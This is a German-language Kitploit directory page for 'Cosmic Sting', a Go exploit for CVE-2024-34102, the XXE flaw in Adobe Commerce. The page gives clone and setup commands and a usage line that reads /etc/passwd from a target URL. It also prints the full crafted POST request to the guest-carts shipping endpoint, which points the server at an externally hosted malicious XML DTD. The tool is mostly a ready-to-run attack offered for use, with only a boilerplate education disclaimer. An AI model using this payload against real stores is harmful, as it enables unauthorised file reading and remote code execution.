Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-34102 — Auf Go basierender Exploit für CVE-2024-34102, eine XXE-Schwachstelle in Adobe Commerce, die zu Remote-Code-Ausführung führt. Unterstützt Einzel- und Batch-URL-Scans mit SSRF-Dateilesen. | Kitploit
Tools/GitHubGitHub/kento-sec/cve-2024-34102
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubkento-sec/cve-2024-34102

CVE-2024-34102

Auf Go basierender Exploit für CVE-2024-34102, eine XXE-Schwachstelle in Adobe Commerce, die zu Remote-Code-Ausführung führt. Unterstützt Einzel- und Batch-URL-Scans mit SSRF-Dateilesen.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Cosmic Sting: Exploiter für CVE-2024-34102

Cosmic Sting ist ein auf Go basierendes Tool, das dazu entwickelt wurde, die Schwachstelle CVE-2024-34102 (Remote Code Execution) auszunutzen.

Details zu CVE-2024-34102

Adobe-Commerce-Versionen 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 und früher sind von einer Schwachstelle durch unsachgemäße Einschränkung von XML-External-Entity-Referenzen ('XXE') betroffen, die zu beliebiger Codeausführung führen kann. Ein Angreifer könnte diese Schwachstelle ausnutzen, indem er ein präpariertes XML-Dokument sendet, das auf externe Entitäten verweist. Die Ausnutzung dieses Problems erfordert keine Benutzerinteraktion.

Voraussetzungen

  • Go (1.16 oder höher)

Installation

  1. Klonen Sie das Repository:

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. Installieren Sie Abhängigkeiten (falls vorhanden):

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

Einzelne URL

Um das Tool mit einer einzelnen URL auszuführen:

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

Flags

  • -u, --url : Einzelne URL, die ausgenutzt werden soll.
  • -f, --file : Datei, die per SSRF gelesen werden soll.
  • -l, --list : Datei mit einer Liste von URLs, die ausgenutzt werden sollen.

POST-Anfrage mit präparierter XML-DTD-Datei:

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

Lizenz

Dieses Projekt ist nicht lizenziert und wurde nur für ein persönliches Projekt erstellt.

Mitwirken

Beiträge sind willkommen! Bitte öffnen Sie ein Issue oder reichen Sie einen Pull Request für Änderungen ein.

Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke gedacht. Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine Testberechtigung haben.

Autor

Professor the Hunter --> Folgen Sie mir auf Twitter

CVE-2024-34102

Tool herunterladen